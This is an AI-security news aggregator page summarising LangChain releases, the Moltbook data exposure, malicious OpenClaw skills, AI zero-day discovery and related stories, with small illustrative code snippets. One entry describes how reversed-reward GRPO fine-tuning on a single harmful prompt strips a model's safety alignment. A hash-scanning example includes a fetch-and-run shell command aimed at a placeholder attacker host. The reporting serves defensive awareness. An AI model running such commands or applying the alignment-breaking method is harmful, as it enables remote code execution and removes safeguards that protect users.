aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

Industry News

New tools, products, platforms, funding rounds, and company developments in AI security.

1267 items

langchain-core==1.2.11

infonews
security
Feb 10, 2026

The captured content for this entry is GitHub navigation and promotional text (GitHub Copilot, GitHub Spark, and other GitHub services) rather than release notes. The reference to langchain-core==1.2.11 points to a specific release of LangChain (a framework for building applications with language models), but no vulnerability or technical issue is described in the captured content.

LangChain Security Releases

A “QuitGPT” campaign is urging people to cancel their ChatGPT subscriptions

infonews
industry
Feb 10, 2026

QuitGPT is a campaign urging people to cancel their ChatGPT Plus subscriptions, citing concerns about OpenAI president Greg Brockman's donation to a political super PAC and the use of ChatGPT-4 by US Immigration and Customs Enforcement for résumé screening. The campaign, which began in late January and has garnered over 36 million Instagram views, asks supporters to either cancel their subscriptions, commit to stop using ChatGPT, or share the campaign on social media, with organizers hoping that enough canceled subscriptions will pressure OpenAI to change its practices.

80% of Fortune 500 use active AI Agents: Observability, governance, and security shape the new frontier

infonews
security, policy

langchain==1.2.10

infonews
security
Feb 10, 2026

LangChain released version 1.2.10, which includes a bug fix for token counting on partial message sequences (a partial message sequence is a subset of messages in a conversation), dependency updates, and code refactoring to rename internal variables.

langchain-core==1.2.10

infonews
security
Feb 10, 2026

LangChain-core version 1.2.10 includes several updates: dependency bumps across multiple directories, a new ContextOverflowError (an exception raised when a prompt exceeds token limits) for Anthropic and OpenAI integrations, additions to model profiles for tracking text inputs and outputs, improved token counting for tool schemas (structured definitions of what functions an AI can call), and documentation fixes.
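The release notes describe a dedicated exception for prompts that exceed a model's token limit. As a rough illustration of the pattern (not LangChain's actual API; the class, heuristic, and limit below are made up), a pre-flight check might look like:

```python
# Illustrative sketch, not LangChain's actual API: a dedicated exception
# raised when a prompt's estimated token count exceeds the context window.

class ContextOverflowError(Exception):
    """Raised when a prompt would exceed the model's context window."""

def estimate_tokens(text: str) -> int:
    # Crude heuristic: roughly 4 characters per token for English text.
    return max(1, len(text) // 4)

def check_context(prompt: str, max_tokens: int) -> int:
    used = estimate_tokens(prompt)
    if used > max_tokens:
        raise ContextOverflowError(
            f"prompt needs ~{used} tokens but the limit is {max_tokens}"
        )
    return used
```

A typed error like this lets callers trim or summarize the prompt instead of pattern-matching on a provider's generic API error.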

Is it possible to develop AI without the US?

infonews
industry, policy

Romeo Is a Dead Man review – a misfire from a storied gaming provocateur

infonews
industry
Feb 10, 2026

This is a game review for "Romeo Is a Dead Man," the first original game in 10 years from developer Suda51, and it criticizes the game for being disappointing and confusing. The reviewer notes that while Suda51 is known for making creative, unconventional games, this title fails to deliver, instead offering an unclear story filled with confusing references that persist throughout the 20-hour gameplay.

AI-Generated Text and the Detection Arms Race

infonews
safety, research

Structured Context Engineering for File-Native Agentic Systems

infonews
research
Feb 9, 2026

A research paper studied how to present large amounts of structured data (like SQL databases with thousands of tables) to AI language models in different formats (YAML, Markdown, JSON, and TOON) to help them generate correct code. The study found that more advanced models like GPT and Gemini performed much better than open-source models, and that using unfamiliar data formats like TOON actually made models less efficient because they spent extra effort trying to understand the new format.
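The trade-off the paper measures can be felt by serializing the same (hypothetical) table schema two ways and comparing sizes; character count here is only a crude stand-in for token count, and real tokenizers differ per model:

```python
import json

# Hypothetical table schema, serialized two ways; character count is a
# crude stand-in for token count (real tokenizers differ per model).
schema = {"table": "orders",
          "columns": [{"name": "id", "type": "INTEGER"},
                      {"name": "customer_id", "type": "INTEGER"},
                      {"name": "total", "type": "DECIMAL"}]}

as_json = json.dumps(schema, indent=2)

# Compact Markdown rendering of the same schema.
rows = [f"| {c['name']} | {c['type']} |" for c in schema["columns"]]
as_markdown = "\n".join([f"### {schema['table']}", "| column | type |",
                         "| --- | --- |"] + rows)

print(len(as_json), len(as_markdown))  # the Markdown rendering is shorter here
```

Both carry the same information, which is the study's point: format choice changes how much of the context window a schema consumes and how familiar the layout is to the model.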

A one-prompt attack that breaks LLM safety alignment

infonews
safety, research

Why the Moltbook frenzy was like Pokémon

infonews
industry
Feb 9, 2026

Moltbook was an online platform where AI agents (software programs designed to act independently) interacted with each other, which some people saw as a preview of useful AI in the future, but it turned out to be mostly a social experiment and entertainment similar to a 2014 internet phenomenon called Twitch Plays Pokémon. The platform was flooded with crypto scams and many 'AI' posts were actually written by humans controlling the agents, revealing that truly helpful AI systems would need better coordination, shared goals, and shared memory to work together effectively.

langchain-openai==1.1.8

infonews
security
Feb 9, 2026

N/A -- The provided content is a GitHub navigation menu and footer with no technical information about langchain-openai==1.1.8 or any AI/LLM-related issue.

⚡ Weekly Recap: AI Skill Malware, 31Tbps DDoS, Notepad++ Hack, LLM Backdoors and More

mediumnews
security, policy

LLMs are Getting a Lot Better and Faster at Finding and Exploiting Zero-Days

infonews
security, research

OpenClaw Integrates VirusTotal Scanning to Detect Malicious ClawHub Skills

infonews
security, safety

Claude: Speed up responses with fast mode

infonews
industry
Feb 7, 2026

Anthropic released a faster version of Claude Opus 4.6 that operates 2.5 times faster, accessible through a /fast command in Claude Code, but costs 6 times more than the standard version ($30/million input tokens and $150/million output tokens versus the normal $5/million and $25/million). The company is offering a 50% discount until February 16th, reducing the cost multiplier to 3x during that period, and users can also extend the context window (the amount of text the AI can process at once) to 1 million tokens for additional charges.
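The pricing arithmetic in the announcement can be checked directly (rates from the article; the example workload is invented):

```python
# Checking the pricing arithmetic from the announcement (USD per million tokens).
STANDARD = {"input": 5.0, "output": 25.0}   # regular Opus 4.6 rates
FAST = {"input": 30.0, "output": 150.0}     # fast-mode rates (6x standard)

def cost(rates, input_tokens, output_tokens):
    return (rates["input"] * input_tokens
            + rates["output"] * output_tokens) / 1_000_000

# Example workload: 200k input tokens, 50k output tokens.
standard = cost(STANDARD, 200_000, 50_000)  # 1.00 + 1.25 = 2.25
fast = cost(FAST, 200_000, 50_000)          # 6.00 + 7.50 = 13.50
discounted = fast * 0.5                     # 50% promo -> 3x standard

print(standard, fast, discounted)
```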

Moltbook, the Social Network for AI Agents, Exposed Real Humans’ Data

highnews
security
Feb 7, 2026

Moltbook, a social network platform for AI agents to interact with each other, had a serious security flaw where a private key (a secret code used to authenticate users) was exposed in its JavaScript code. This exposed thousands of users' email addresses, millions of API credentials (login tokens), and private communications between AI agents, allowing attackers to impersonate any user. The vulnerability is particularly notable because Moltbook's code was entirely written by AI rather than human programmers.
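A leak like this is the kind of thing a pre-deployment secret scan can catch. A minimal sketch, with illustrative patterns rather than a complete ruleset:

```python
import re

# Minimal sketch of the kind of check that would have caught a key shipped
# in client-side JavaScript: scan the bundle for strings that look like
# private keys or long API credentials. Patterns are illustrative only.
PATTERNS = [
    re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
    re.compile(
        r"""(?:api[_-]?key|secret|token)['"]?\s*[:=]\s*['"][A-Za-z0-9_\-]{20,}['"]""",
        re.I,
    ),
]

def find_secrets(source: str):
    # Return the patterns that matched, so a CI job can report what leaked.
    return [p.pattern for p in PATTERNS if p.search(source)]

bundle = 'const cfg = { apiKey: "sk_live_0123456789abcdefghij" };'
print(find_secrets(bundle))  # the credential pattern matches
```

Real secret scanners add entropy checks and provider-specific key formats, but even a check this crude blocks the obvious case of a credential baked into shipped frontend code.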

langchain-anthropic==1.3.2

infonews
security
Feb 6, 2026

N/A -- The provided content appears to be navigation menu text and marketing copy from a GitHub webpage, not technical documentation describing a security issue, bug, or vulnerability related to langchain-anthropic version 1.3.2.

OpenClaw's Gregarious Insecurities Make Safe Usage Difficult

mediumnews
security, safety

langchain==1.2.9

infonews
industry
Feb 6, 2026

LangChain version 1.2.9 includes several bug fixes and feature updates, such as normalizing raw schemas in middleware response formatting, supporting state updates through wrap_model_call (a function that wraps model calls to add extra behavior), and improving token counting (the process of measuring how many units of text an AI needs to process). The release also fixes issues like preventing UnboundLocalError (a programming error where code tries to use a variable that hasn't been defined yet) when no AIMessage exists.
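The UnboundLocalError fix describes a classic Python pitfall: a variable assigned only inside a conditional branch. A minimal reconstruction of the bug class (not LangChain's actual code; the message format is invented):

```python
# Sketch of the bug class fixed in the release: if a variable is only
# assigned inside a branch, referencing it afterwards raises
# UnboundLocalError when the branch never ran (e.g. no AI message present).

def last_ai_message_buggy(messages):
    for m in messages:
        if m.get("role") == "ai":
            last = m
    return last  # UnboundLocalError if no "ai" message was seen

def last_ai_message_fixed(messages):
    last = None  # initialize before the loop so the name always exists
    for m in messages:
        if m.get("role") == "ai":
            last = m
    return last

print(last_ai_message_fixed([{"role": "human", "content": "hi"}]))  # None
```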

Page 47 of 64
A “QuitGPT” campaign is urging people to cancel their ChatGPT subscriptions (MIT Technology Review)

80% of Fortune 500 use active AI Agents: Observability, governance, and security shape the new frontier

Feb 10, 2026

Most Fortune 500 companies now use AI agents (software that can act and make decisions with minimal human input), but many lack visibility into how many agents are running and what data they access, creating security risks. The report recommends applying Zero Trust security principles (strong identity verification, plus giving users and agents only the minimum access they need) to AI agents the same way organizations do for human employees.

Microsoft Security Blog
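The Zero Trust recommendation boils down to default-deny, least-privilege checks on every agent action. A minimal sketch, with made-up agent and resource names:

```python
# Minimal default-deny access check for AI agents, in the spirit of the
# Zero Trust recommendation. Agent and resource names are made up.

POLICY = {
    ("invoice-agent", "billing-db"): {"read"},
    ("support-agent", "ticket-queue"): {"read", "write"},
}

def is_allowed(agent: str, resource: str, action: str) -> bool:
    # Deny unless an explicit grant exists (least privilege).
    return action in POLICY.get((agent, resource), set())

print(is_allowed("invoice-agent", "billing-db", "read"))   # True
print(is_allowed("invoice-agent", "billing-db", "write"))  # False
```

The key property is the default: an agent nobody thought about gets no access, which is exactly the visibility gap the report describes.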
langchain==1.2.10 (LangChain Security Releases)
langchain-core==1.2.10 (LangChain Security Releases)

Is it possible to develop AI without the US?

Feb 10, 2026

Major tech companies (Alphabet, Amazon, Microsoft, and Meta) plan to invest $600 billion in AI this year, while Persian Gulf countries are developing their own AI systems to reduce dependence on the United States. The piece asks whether AI development can happen independently of US tech dominance.

The Guardian Technology

Romeo Is a Dead Man review – a misfire from a storied gaming provocateur (The Guardian Technology)
AI-Generated Text and the Detection Arms Race

Feb 10, 2026

Generative AI has created a widespread problem: institutions like literary magazines, academic journals, and courts are overwhelmed by AI-generated submissions, forcing them to either shut down or deploy AI tools to defend against the influx. The result is an 'arms race' in which both sides use AI for opposing purposes, with real risks to institutions but also some unexpected benefits, such as AI giving non-English-speaking researchers access to writing assistance that was previously expensive.

Schneier on Security

Structured Context Engineering for File-Native Agentic Systems (Simon Willison's Weblog)
A one-prompt attack that breaks LLM safety alignment

Feb 9, 2026

Researchers discovered that Group Relative Policy Optimization (GRPO), a technique normally used to improve AI safety, can be reversed to break safety alignment when the reward signal is changed. Given even a single harmful prompt, with responses scored on how well they fulfill the harmful request rather than refuse it, a safety-aligned model gradually abandons its safety guidelines and becomes willing to produce harmful content across many categories it never encountered during the attack.

Microsoft Security Blog
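The core mechanism is easy to see in miniature. Below is a simplified group-relative advantage computation (the "group relative" part of GRPO, omitting the usual normalization by the group's standard deviation; not the paper's code): flipping the reward signal flips the sign of every advantage, so updates push toward exactly the behavior safety tuning suppressed.

```python
# Simplified group-relative advantage computation: each sampled response's
# advantage is its reward relative to the group mean. (GRPO also divides by
# the group's standard deviation, omitted here for clarity.)

def group_relative_advantages(rewards):
    mean = sum(rewards) / len(rewards)
    return [r - mean for r in rewards]

safety_rewards = [1.0, 0.0, 1.0, 0.0]          # refusals scored highly
attack_rewards = [-r for r in safety_rewards]  # reversed reward signal

print(group_relative_advantages(safety_rewards))  # [0.5, -0.5, 0.5, -0.5]
print(group_relative_advantages(attack_rewards))  # [-0.5, 0.5, -0.5, 0.5]
```

With the safety reward, refusals get positive advantage and are reinforced; with the flipped reward, the same arithmetic reinforces the compliant responses instead.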
Why the Moltbook frenzy was like Pokémon (MIT Technology Review)
langchain-openai==1.1.8 (LangChain Security Releases)

⚡ Weekly Recap: AI Skill Malware, 31Tbps DDoS, Notepad++ Hack, LLM Backdoors and More

Feb 9, 2026

This recap highlights how attackers are exploiting trusted tools and marketplaces rather than breaking security controls directly. Key threats include malicious skills appearing in ClawHub (a registry for AI agent add-ons), a record-breaking 31.4 Tbps DDoS attack (a flood attack that overwhelms servers with massive traffic), and compromised update infrastructure for Notepad++ being used to distribute malware. The pattern shows attackers abusing trust in updates, app stores, and AI workflows to gain access to systems.

Fix: OpenClaw has announced a partnership with Google's VirusTotal malware scanning platform to scan skills uploaded to ClawHub as part of a defense-in-depth approach to improve security. Additionally, the source notes that open-source agentic tools like OpenClaw require users to maintain higher baseline security competence than managed platforms.

The Hacker News

LLMs are Getting a Lot Better and Faster at Finding and Exploiting Zero-Days

Feb 9, 2026

Claude Opus 4.6, a new AI model, is significantly better at finding zero-day vulnerabilities (security flaws unknown to vendors and the public) than previous models, discovering high-severity bugs in well-tested code that fuzzing tools (programs that test software by sending random inputs) had missed for years. Unlike traditional fuzzing, Opus 4.6 analyzes code the way a human researcher would, studying past fixes and code patterns to reason about which inputs would cause failures.
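The contrast with fuzzing is easier to see with a toy example: a random fuzzer finds shallow crashes by volume, with no reasoning about the code. The parser and its bug below are invented:

```python
import random

# Toy random fuzzer, to contrast with the code-reading approach described
# above: throw random bytes at a parser and record unexpected failures.

def parse(data: bytes) -> int:
    # Bug: reads data[0] before checking that data is non-empty.
    if data[0] == 0x4D:
        return 1
    raise ValueError("bad magic")

def fuzz(trials: int = 1000, seed: int = 7):
    rng = random.Random(seed)
    crashes = []
    for _ in range(trials):
        blob = bytes(rng.randrange(256) for _ in range(rng.randrange(0, 8)))
        try:
            parse(blob)
        except ValueError:
            pass  # expected rejection, not a bug
        except Exception as exc:  # unexpected failure: a fuzzing "find"
            crashes.append(type(exc).__name__)
    return crashes

print(set(fuzz()))  # random inputs stumble onto the IndexError
```

A fuzzer reaches this bug only because empty inputs are likely by chance; bugs gated behind specific structure (checksums, magic values, state) are where random inputs stall and code-level reasoning pays off.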

Schneier on Security

OpenClaw Integrates VirusTotal Scanning to Detect Malicious ClawHub Skills

Feb 8, 2026

OpenClaw has partnered with VirusTotal (a malware analysis service owned by Google) to scan skills uploaded to ClawHub, its marketplace for AI agent extensions. The system creates a unique SHA-256 hash (a digital fingerprint) for each skill and checks it against VirusTotal's database, automatically approving benign skills, flagging suspicious ones, and blocking malicious ones, with daily rescans of active skills. However, OpenClaw acknowledged that this scanning is not foolproof and some malicious skills using concealed prompt injection (tricking the AI by hiding malicious instructions in user input) may still get through.

Fix: OpenClaw announced it will publish a comprehensive threat model, public security roadmap, formal security reporting process, and details about a security audit of its entire codebase. Additionally, the platform added a reporting option that allows signed-in users to flag suspicious skills.

The Hacker News
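The hash-lookup step described above is straightforward to sketch (the verdict sets stand in for VirusTotal's database; note that an exact-hash check only catches known-bad bytes, which is why concealed prompt injection can still slip through):

```python
import hashlib

# Sketch of the hash-lookup step: fingerprint a skill's contents with
# SHA-256 and map the digest to a verdict. The hash sets below are
# stand-ins for VirusTotal's database.

KNOWN_MALICIOUS = {hashlib.sha256(b"curl evil.example | sh").hexdigest()}
KNOWN_SUSPICIOUS = set()

def scan_skill(contents: bytes) -> str:
    digest = hashlib.sha256(contents).hexdigest()
    if digest in KNOWN_MALICIOUS:
        return "block"
    if digest in KNOWN_SUSPICIOUS:
        return "flag"
    return "approve"

print(scan_skill(b"echo hello"))              # approve
print(scan_skill(b"curl evil.example | sh"))  # block
```

Because changing a single byte changes the digest entirely, this layer catches known samples and repacks of them, not novel payloads, hence the defense-in-depth framing.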
Claude: Speed up responses with fast mode (Simon Willison's Weblog)

Moltbook, the Social Network for AI Agents, Exposed Real Humans’ Data

Fix: Moltbook has fixed the security flaw, which was discovered by the security firm Wiz.

Wired (Security)

langchain-anthropic==1.3.2 (LangChain Security Releases)
OpenClaw's Gregarious Insecurities Make Safe Usage Difficult

Feb 6, 2026

Security researchers discovered multiple vulnerabilities in OpenClaw, an AI assistant, including malicious skills (add-on programs that extend the assistant's abilities) and problematic configuration settings that make it unsafe to use. The issues affect both the installation and removal processes of the software.

Dark Reading

langchain==1.2.9 (LangChain Security Releases)